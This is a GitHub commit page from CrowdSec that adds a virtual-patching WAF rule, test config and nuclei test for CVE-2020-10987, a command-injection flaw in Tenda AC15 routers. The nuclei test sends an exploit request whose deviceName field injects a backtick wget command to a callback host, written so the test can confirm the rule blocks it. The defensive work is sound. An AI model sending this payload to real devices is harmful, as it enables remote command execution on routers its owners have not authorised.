Skip to content

Commit f1bda9d

Browse files
Add vpatch-CVE-2020-10987 rule and test (#1588)
* Add vpatch-CVE-2020-10987 rule * Add vpatch-CVE-2020-10987 test config * Add CVE-2020-10987.yaml test * Add vpatch-CVE-2020-10987 rule to vpatch collection * Update vpatch for CVE-2020-10987 with regex matching --------- Co-authored-by: Thibault "bui" Koechlin <[email protected]>
1 parent 1a55590 commit f1bda9d

File tree

4 files changed

+62
-0
lines changed

4 files changed

+62
-0
lines changed
Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
## autogenerated on 2025-11-26 15:14:54
2+
id: CVE-2020-10987
3+
info:
4+
name: CVE-2020-10987
5+
author: crowdsec
6+
severity: info
7+
description: CVE-2020-10987 testing
8+
tags: appsec-testing
9+
http:
10+
- raw:
11+
- |
12+
POST /goform/setUsbUnload HTTP/1.1
13+
Host: {{Hostname}}
14+
Content-Type: application/x-www-form-urlencoded
15+
Accept: */*
16+
17+
deviceName=test`;wget http://{{interactsh-url}};`
18+
cookie-reuse: true
19+
matchers:
20+
- type: status
21+
status:
22+
- 403
Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
## autogenerated on 2025-11-26 15:14:54
2+
appsec-rules:
3+
- ./appsec-rules/crowdsecurity/base-config.yaml
4+
- ./appsec-rules/crowdsecurity/vpatch-CVE-2020-10987.yaml
5+
nuclei_template: CVE-2020-10987.yaml
Lines changed: 34 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
## autogenerated on 2025-11-26 15:14:54
2+
name: crowdsecurity/vpatch-CVE-2020-10987
3+
description: 'Detects command injection in Tenda AC15 AC1900 via deviceName parameter in setUsbUnload endpoint.'
4+
rules:
5+
- and:
6+
- zones:
7+
- URI
8+
transform:
9+
- lowercase
10+
match:
11+
type: contains
12+
value: /goform/setusbunload
13+
- zones:
14+
- BODY_ARGS
15+
variables:
16+
- deviceName
17+
transform:
18+
- lowercase
19+
- urldecode
20+
match:
21+
type: regex
22+
value: '[^a-z0-9]'
23+
24+
labels:
25+
type: exploit
26+
service: http
27+
confidence: 3
28+
spoofable: 0
29+
behavior: 'http:exploit'
30+
label: 'Tenda AC15 - RCE'
31+
classification:
32+
- cve.CVE-2020-10987
33+
- attack.T1190
34+
- cwe.CWE-78

collections/crowdsecurity/appsec-virtual-patching.yaml

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -138,6 +138,7 @@ appsec-rules:
138138
- crowdsecurity/vpatch-CVE-2020-8656
139139
- crowdsecurity/vpatch-CVE-2025-27222
140140
- crowdsecurity/vpatch-CVE-2025-64446
141+
- crowdsecurity/vpatch-CVE-2020-10987
141142
author: crowdsecurity
142143
contexts:
143144
- crowdsecurity/appsec_base

0 commit comments

Comments
 (0)